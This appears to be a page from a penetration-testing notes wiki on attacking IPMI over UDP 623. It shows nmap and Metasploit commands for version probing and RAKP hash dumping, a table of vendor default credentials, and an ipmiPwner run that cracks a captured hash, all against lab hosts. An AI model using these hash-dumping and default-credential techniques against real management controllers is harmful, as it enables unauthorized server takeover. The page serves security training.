IPMI (623 UDP)

Theory

Intelligent Platform Management Interface (IPMI) is a set of standardized specifications for hardware-based host management systems used for system management and monitoring. It acts as an autonomous subsystem and works independently of the host's BIOS, CPU, firmware, and underlying operating system. IPMI provides sysadmins with the ability to manage and monitor systems even if they are powered off or in an unresponsive state.

Version

sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

msf6 > use auxiliary/scanner/ipmi/ipmi_version 
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS     10.129.42.195    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      623              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads


msf6 auxiliary(scanner/ipmi/ipmi_version) > run

[*] Sending IPMI requests to 10.129.42.195->10.129.42.195 (1 hosts)
[+] 10.129.42.195:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0) 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Default password

Product

Username

Password

Dell iDRAC

root

calvin

HP iLO

Administrator

randomized 8-character string consisting of numbers and uppercase letters

Supermicro IPMI

ADMIN

Metasploit Wordlists

ls /opt/tools/metasploit-framework/data/wordlists/ | grep ipmi
ipmi_passwords.txt
ipmi_users.txt

Get password

Cracking IPMI Passwords Remotelyfish2.com

Hashes

Metasploit Dumping Hashes

msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options 

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                 Current Setting                                                    Required  Description
   ----                 ---------------                                                    --------  -----------
   CRACK_COMMON         true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                     no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                        no        Save captured password hashes in john the ripper format
   PASS_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS               10.129.42.195                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                623                                                                yes       The target port
   THREADS              1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line



msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.129.42.195:623 - IPMI - Hash found: ADMIN:8e160d4802040000205ee9253b6b8dac3052c837e23faa631260719fce740d45c3139a7dd4317b9ea123456789abcdefa123456789abcdef140541444d494e:a3e82878a09daa8ae3e6c22f9080f8337fe0ed7e
[+] 10.129.42.195:623 - IPMI - Hash for user 'ADMIN' matches password 'ADMIN'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

cat ipmi.txt
a870af384080000fcb12dffed486b2d2307f417d3261a28f099e9b1b0fe99d1f77f2b940cfba668a123456789abcdefa123456789abcdef140561646d696e:9d0c8a64d4b9cf7482ba54a9056e6b147777e025

I don't know why but hashcat didn't find the password :(

ipmiPwner

GitHub - c0rnf13ld/ipmiPwner: Exploit to dump ipmi hashesGitHub

Apr 06, 2024 - 05:26:05 (EDT) exegol-CPTS ipmiPwner # python3 ipmipwner.py --host 10.129.154.218 -u admin -c python -pW /usr/share/wordlists/rockyou.txt -oH hash -oC crackedHash


[*] Checking if port 623 for host 10.129.154.218 is active
[*] The username: admin is valid                                                  
[*] Saving hash for user: admin in file: "hash"
[*] The hash for user: admin
   \_ $rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a
[*] Starting the hash cracking with python

[*] Reading the wordlist by chunks
[*] Chunk size: 1048576
[*] Reading Bytes: 139921497/139921497                                                  
[*] Hash Cracking Started
[+] Password Found, Cracked on line: [613]
[+] The password: trinity
[+] Time elapsed: 0.00254
[+] Result saved in: crackedHash
[Apr 06, 2024 - 05:26:58 (EDT)] exegol-CPTS ipmiPwner # cat crackedHash 
$rakp$a4a3a2a0020d0000bf76f5a3737701b46b64c3b9cab48c6c6857615420edfc7400a0a78e287b7f9fa123456789abcdefa123456789abcdef140561646d696e$eb76dd944123865bbaeab7e9503bdfc1d741c56a:t*****y
Time elapsed: 0.00254
[Apr 06, 2024 - 05:27:19 (EDT)] exegol-CPTS ipmiPwner #

Resources

623/UDP/TCP - IPMI - HackTricksbook.hacktricks.xyz

https://ppn.snovvcrash.rocks/pentest/infrastructure/ipmippn.snovvcrash.rocks

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Nmap Network Scanning The official guide to the Nmap Security Scanner, a free and open source utility used by millions of people for network discovery, administration, and security auditing. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book by Nmap's original author suits all levels of security and networking professionals.
The Art of Network Penetration Testing A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.
Network Basics for Hackers The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousIMAP POP3 (110, 143, 993, 995)NextIPsec / IKE VPN (500 UDP)

Last updated 6 months ago